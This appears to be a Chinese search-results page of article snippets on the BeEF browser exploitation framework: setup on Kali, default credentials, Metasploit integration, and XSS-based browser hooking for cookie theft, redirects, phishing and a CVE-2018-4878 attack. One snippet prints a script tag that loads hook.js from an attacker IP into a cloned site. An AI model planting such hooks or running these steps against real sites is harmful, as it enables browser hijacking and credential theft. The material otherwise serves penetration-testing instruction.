展开

关键词

Hacker基础之工具篇 BeEF

今天我们稍微讲一下BeEF的使用,BeEF是一个XSS平台 BeEF 这个工具在Kali已经预装了,我们直接点击就可以打开了 ? 改一下可以了 (这里注意,如果你用的是Kali虚拟机,记得用桥接模式) 当然,这里不一定非要提交这个字符串,我们可以根据实际情况更改一些标签等等 这里简单演示一下,在一个网页里面加入这个script之后 BeEF 之后我们在Kali里面打开BeEF的Web界面 ? 默认密码是beef:beef 之后 我们就可以用浏览器打开我们下载的离线HTML了 马上BeEF中就可以看到如下的显示 ? 就可以看到我们的浏览器在线 如果是正在攻击一个IP,你将会在BeEF上看到这些 ? 好了,我们就大概演示BeEF的功能和用途到这里,大家可以熟悉熟悉这个工具的使用,明天我们讲XSS会用到

48720

kali下安装beef并联合Metasploit

安装beef 在kali中安装beef比较容易,一条命令就可以安装了,打开终端,输入apt-get install beef-xss ,安装前可以先更新一下软件apt-get update 修改beef 密码 beef默认密码太弱,是无法直接登陆的,需要先修改一下密码,进入到相关路径cd /usr/share/beef-xss/进入config.yaml文件中修改密码,命令vi config.yaml 启动beef 直接使用下面命令就可以。 systemctl start beef-xss.service #开启beef systemctl stop beef-xss.service #关闭beef systemctl restart 之后回到beef目录,输入./beef -x发现和metasploit连接成功 ?

84520
  • 广告
    关闭

    90+款云产品免费体验

    提供包括云服务器,云数据库在内的90+款云计算产品。打造一站式的云产品试用服务,助力开发者和企业零门槛上云。

  • 您找到你想要的搜索结果了吗?
    是的
    没有找到

    工具的使用 | BeEF的使用

    目录 BeEF的简单介绍 BeEF-XSS的使用 获取用户Cookie  网页重定向 社工弹窗 钓鱼网站(结合DNS欺骗) BeEF的简单介绍 BEEF (The Browser Exploitation 前端会轮询后端是否有新的数据需要更新,同时前端也可以向后端发送指示, BeEF持有者可以通过浏览器来登录 BeEF 的后端,来控制前端(用户的浏览器)。BeEF一般和XSS漏洞结合使用。 BeEF的目录是: /usr/share/beef-xss/beef BeEF-XSS的使用 在使用之前,先修改/usr/share/beef-xss/config.yaml 配置文件,将ip修改成我们 /beef-xss 打开 ,然后手动打开浏览器链接 kali已经把beef-xss做成服务了,我们也可以使用systemctl 命令来启动或关闭beef服务 · systemctl start beef-xss.service #开启beef服务 · systemctl stop beef-xss.service #关闭beef服务 · systemctl restart beef-xss.service

    21720

    Beef框架中加载metasploit模块

    Beef框架中加载metasploit模块 From ChaMd5安全团队核心成员 小丸子 一、前言 近段时间一直看到网上讨论有关Beef框架中如何加载Metasploit模块的问题,也就是Beef如何与 二、脚本文件配置 配置Beef脚本文件如下: 1、编辑/usr/share/beef-xss/config.yaml文件 metasploit=true ? 2、编辑/usr/share/beef-xss/extensions/metasploit/config.yaml host: "192.168.0.13" (kali本机的IP地址) 启动Beef服务 cd /usr/share/beef-xss/ ./beef ? ?

    72860

    beef漏洞利用框架安装.md

    简介 BeEF是目前欧美最流行的web框架攻击平台,它的全称是 the Browser exploitation framework project.最近两年国外各种黑客的会议都有它的介绍,很多pentester BeEF是我见过的最好的xss利用框架,他同时能够配合metasploit进一步渗透主机,强大的有些吓人!! 4.安装bundle: gem install bundle bundle install 5.更新beEF: . /update-beef 6.启动beEF: . /beef 7.启动浏览器: http://127.0.0.1:3000/ui/panel //进入beef后台管理页面 使用默认用户名 beef 密码 beef登录 8.使用: BeEF自带了一个hack

    54020

    BeEF 内网钓鱼获取主机信息

    BeEF是目前欧美最流行的web框架攻击平台,它的全称是 the Browser exploitation framework project.最近两年国外各种黑客的会议都有它的介绍,很多pentester 通过XSS这个简单的漏洞,BeEF可以通过一段编制好的javascript控制目标主机的浏览器,通过浏览器拿到各种信息并且扫描内网信息,同时能够配合metasploit进一步渗透。 1.首先打开Kali安装BeEF。已安装的进行更新 ? 2.启动BeEF 使用命令 cd /usr/share 进入Beef当前目录 ls查看所有应用 ? 3.引用beef-xss这个模块  使用命令 cd beef-xss 切换到这个目录 使用命令./beef 开启这个应用 ? 4.此时可以看到 beef给了两个URL 我们这时候使用 UI URL 在浏览器上输入进入这个Beef后台 ? 5.Beef 后台用户名密码 均为 beef 然后我们登录进去 ?

    74030

    BeEF 客户端攻击框架的秘密(一)

    二、在kali下使用BeEf kali系统已经默认安装有beef框架了,对于新的kali 2020版的kali系统,使用 apt install beef-xss即可安装。 beef-xss# 命令方式启动 beef-xss-stop # 命令方式关闭 systemctl start beef-xss.service #开启 beefsystemctl stop beef-xss.service #关闭 beefsystemctl restart beef-xss.service #重启beef 在首次启动时,需要修改beef的密码,按提示输入修改的密码即可 三、体验一波beef 1.首先登录beef管理后台。 ? 2.寻找一个存在XSS漏洞的网页,其中我们需要将beef服务的钩子文件通过XSS漏洞加载到受害者的浏览器中运行。 3.当受害者打开浏览器客户端时,我们在beEf的管理后台就可以看到ip为192.168.231.3的主机上线了。 ? 四、BeEf功能及作用介绍 ?

    1.7K10

    浏览器渗透之BeEF的高级烹饪方式

    BeFF的高级烹饪方式 BeEF介绍 BeEF是浏览器攻击框架的简称,是一款专注于浏览器端的渗透测试工具 Kali Linux内已经有BeEF的环境,只需要进入/usr/share/beef-xss目录下 /beef运行即可 cd /usr/share/beef-xss/ ./beef BeEF运行截图: ? BeEF启动之后会输出在终端很多重要的信息 Browser Exploitation Framework (BeEF) 0.4.7.0-alpha(BeEF的版本是0.4.7.0) 12 extensions 登陆凭据: 用户名/密码:beef 用户名密码的配置文件是:config.yaml ? BeEF主框架控制台页面: ? 鼠标点击here就可以让浏览器和BeEF挂钩(僵尸) ?

    1.1K10

    【漏洞复现】BeEF与CVE-2018-4878漏洞利用

    今天来看看CVE-2018-4878结合BeEF的利用吧~ ? Part.2 BeEF BeEF的利用 在前面我们讲过使用存储型XSS进行网页挂马: 【XSS漏洞】通过XSS实现网页挂马 这里我们也来试试这种操作。 这里我们试试一款kali自带的工具beef-xss: ? 运行beef: ? 访问http://192.168.31.54:3000/ui/authentication即可登陆: ? //登录名和密码默认都是:beef 我们将hook.js页面插入到存储型XSS处: ? 可以看到BeEF上,靶机顺利上线: ? 在指令区使用重定向功能,将网页重定向到前面的攻击页面: ? 靶机的浏览器就会自动跳转到攻击页面,执行flash插件: ?

    47320

    基于Beef-XSS+Sunny-Ngrok进行内网安全测试

    Beef-XSS框架无疑是当今最强大的浏览器攻击框架,网络上也存在很多关于它的教程,但是大部分都是基于内网环境下的教学,这就使得攻击效果大打折扣,另外大部分XSS教程只是实现一个aler(1)便证明达到了效果 ,而Beef-XSS要保证完整效果就要加载hook.js文件,在存在一定过滤的情况下,这是有一定难度的。 0x00 实验工具 kali linux v2.0 beef-xss sunny-ngrok: http://www.ngrok.cc 0x01 开通tcp代理,并下载客户端进行内网穿透 都是老司机注册这里就不说了 0x02 自定义监听端口,开启beef-xss 在启动beef-xss之前,我么们要修改下配置文件中的端口。配置文件位置:/etc/beef-xss/config.yaml。 现在我们直接启动beef-xss就好了,这个就很简单了直接输入beef-xss回车: ?

    54250

    Kali Linux Web渗透测试手册(第二版) - 5.5 - 利用BeEF执行xss攻击

    环境准备 在开始之前,我们需要确保已经启动了BeEF服务,默认管理页面的url是: http://127.0.0.1:3000/ui/panel(默认账号密码为BeEF /BeEF)。 1. 在kali linux中默认的BeEF的服务是不起作用的,所以不能以beef-xss这样简单的方式来启动BeEF。 我们需要从安装它的目录下启动它,如下图所示: l cd/usr/share/beef-xss/ l ./beef ? 2. 现在,浏览器打开http://127.0.0.1:3000/ui/panel并使用默认账户名密码(beef/beef)。如果成功打开,那我们就准备进行下一步。 在这个例子中,我们是调用了BeEF服务器的钩子。

    2.2K10

    【实战】利用鸡肋上传点配合beef劫持游览器权限

    漏洞复现: 上传点可以解析html格式的文件 1)HTML: 编写恶意的htm并加入beef的js,如图2所示。 ? 上传到网站,如图3所示。 ? 上传完成后,点击详情,如图4所示。 ? 通过攻击者在beef上操作,让用户览器访问攻击者指定的网址。 让用户当前空白界面跳转到公司oa系统,如图9所示。 ? 效果,如图10所示。 ? 修复建议: 1) 严格限定上传文件格式,大小。

    35630

    BeEF+DVWA靶场XSS漏洞攻击简单入门实践

    免责声明:本公众号安全类、工具类文章仅用于安全学习、安全研究、技术交流,内容来源于互联网已公开内容,若读者利用此文所提供的信息而造成的任何直接或间接的后果和损失...

    29630

    网站克隆:setoolkit社工软件

    本文转自行云博客https://www.xy586.top beef-xss 安装beef-xss:apt install beef-xss 安装完成之后运行beef-xss: ? 将beef-xss生成的js代码,放入网站中 <script src="http://192.168.232.138:3000/hook.js"></script> 被攻击目标打开网页链接,则beef

    81431

    kali安装MITMF

    它可以结合 beef 一起来使用,并利用 beef 强大的 hook 脚本来控制目标客户端。下面让我们一起看看如何在 Kali2.0上安装使用 Mitmf 。 下面让我们运行 beef 来调用 beef 强大的 hook 脚本。首先我们进入beef目录并启动它。 cd /usr/share/beef-xss . /beef image.png 我们在浏览器打开UI界面后,下面我们就用 mitmf 进行中间人攻击。

    12920

    初窥火狐浏览器插件后门

    beef 支持 https 现在的浏览器是不允许在 https 的网页引入 http 资源的(图片除外),但是现在的知名网址,大都是 https 了,所以不能放弃劫持 https 的网站。 值得一提的是,需要把那几个文件提供给 beef。 申请完毕之后,下载到本地解压,其中有如下几个文件。 ? beef 使用的 web 服务器软件是 apache,所以我们打开 apache 文件夹。 beef 只需要文件 2 和文件 3,先把 beef 原来的证书备份一下,然后把文件 2 文件 3 复制到 beef 证书的存访位置,然后把文件 2 改名为 beef_cert.pem,文件 3 改名为 然后重新启动 beef,你就得用 https 协议访问 3000 端口了。 然后登陆 beef 后台,在靶机浏览器打开几个网站,稍等一会。 ? 这时我们看到,靶机上线了。 ? 看一下靶机页面源代码。 ? 执行个模块试试 ?

    45500

    使用各种扫描工具的你,不但踩了“蜜罐”可能还要被团灭了

    这个功能丰富的xss平台,毕竟自动化方面beef做的非常不错,但是同样beef也存在一定的被反杀风险。 alert('Found Beef inject! beef参数和所有脚本function还是存在。 这意味着,如果检测到页面有beef的参数,证明页面被注入了beef的XSS脚本; 如果同时通过xhr动态获取到了ApiToken,那只有一种可能——攻击者和你,同时在线!赶紧争分夺秒搞事! alert('Found Beef is Online!

    67380

    R语言数据分析与挖掘(第五章):方差分析(3)——协方差分析

    中的数据集hotdog进行操作演练,该数据集包含53个观测值,每个观测值中含有3个变量,分别为:种类(Type)、卡路里含量(Calories)和钠含量(Sodium),其中变量Type为分类变量,共包含Beef > data(hotdog) > dim(hotdog) [1] 54 3 > head(hotdog) Type Calories Sodium 1 Beef 186 495 2 Beef 181 477 3 Beef 176 425 4 Beef 149 322 5 Beef 184 482 6 Beef 190 587 > table(hotdog$Type) Beef Meat Poultry 20 17 17 > summary(hotdog) Type Calories Sodium Beef :20 Min

    2.4K31

    记录一次有点儿不一样的XSS

    target.com.evil.com的域名,我在URL中传参.evil.com,页面拼接后所访问的地址不就是这样: http://target.com.evil.com 这样一来,我在target.com.evil.com站点下,开个beef evil.com的时候,目标页面就会访问到我自己的域名,如果访问的域名页面中包含了 beef 的 hook.js,那目标不就上线了嘛,nice 开整! 测试一下,beef 的 hook.js 能不能访问 ? 在 beef 的 hook.js 页面可以成功访问之后,就可以构造 URL 了,这时只要 URL 后传入一个包含 hook.js 的页面就可以上线了,这里以 beef 的 demo 页面/demos/basic.html 可以看到当前页面成功访问到了target.com.evil.com:3000/demos/basic.html,此时看看 beef 里有没有上线 ? beef 成功上线,最后再来弹个窗,嘿嘿 ? ?

    18820

    无监督学习 聚类分析①聚类分析

    data(nutrient, package = "flexclust") > head(nutrient, 4) energy protein fat calcium iron BEEF BRAISED 340 20 28 9 2.6 HAMBURGER 245 21 17 9 2.7 BEEF ROAST (d)[1:4,1:4] BEEF BRAISED HAMBURGER BEEF ROAST BEEF STEAK BEEF BRAISED 0.00000 95.6400 80.93429 35.24202 HAMBURGER 95.64000 0.0000 176.49218 130.87784 BEEF ROAST 80.93429 176.4922 0.00000 45.76418 BEEF STEAK 35.24202 130.8778 45.76418 0.00000 层次聚类分析 如前所述

    38020

    相关产品

    • 云服务器

      云服务器

      云端获取和启用云服务器,并实时扩展或缩减云计算资源。云服务器 支持按实际使用的资源计费,可以为您节约计算成本。 腾讯云服务器(CVM)为您提供安全可靠的弹性云计算服务。只需几分钟,您就可以在云端获取和启用云服务器,并实时扩展或缩减云计算资源。云服务器 支持按实际使用的资源计费,可以为您节约计算成本。

    相关资讯

    热门标签

    扫码关注云+社区

    领取腾讯云代金券